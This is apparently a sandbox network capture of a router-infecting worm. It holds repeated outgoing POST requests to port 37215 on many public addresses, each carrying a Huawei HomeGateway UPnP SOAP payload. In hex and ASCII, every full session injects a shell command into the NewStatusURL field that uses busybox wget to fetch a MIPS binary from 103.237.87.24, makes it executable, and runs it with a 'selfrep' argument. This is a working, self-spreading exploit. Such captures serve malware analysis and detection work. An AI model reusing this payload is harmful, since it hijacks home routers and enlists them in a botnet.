                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2226192.168.2.133438098.40.249.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598522902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2227192.168.2.134563641.133.125.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598951101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2228192.168.2.1339140217.113.216.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598956108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2229192.168.2.134219641.62.167.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.599015951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2230192.168.2.1359732157.8.9.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.599071980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2231192.168.2.1335938166.222.188.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.599137068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2232192.168.2.1354924153.38.86.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.599163055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2233192.168.2.133969850.171.159.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.599196911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2234192.168.2.1352290157.79.35.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.599211931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2235192.168.2.1352890197.115.108.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.599224091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
